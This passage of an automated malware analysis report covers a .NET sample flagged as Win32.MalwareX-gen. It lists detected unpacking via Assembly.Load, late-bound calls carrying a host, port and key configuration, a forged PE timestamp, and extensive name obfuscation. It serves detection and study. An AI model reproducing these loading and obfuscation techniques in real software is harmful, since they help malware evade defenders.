Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, Form1.cs	.Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])

Binary contains a suspicious time stamp

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: 0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_009DEE10 pushfd ; iretd		0_2_009DEE11
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05458160 push esp; iretd		5_2_05458161

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: section name: .text entropy: 7.7368081138603095

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
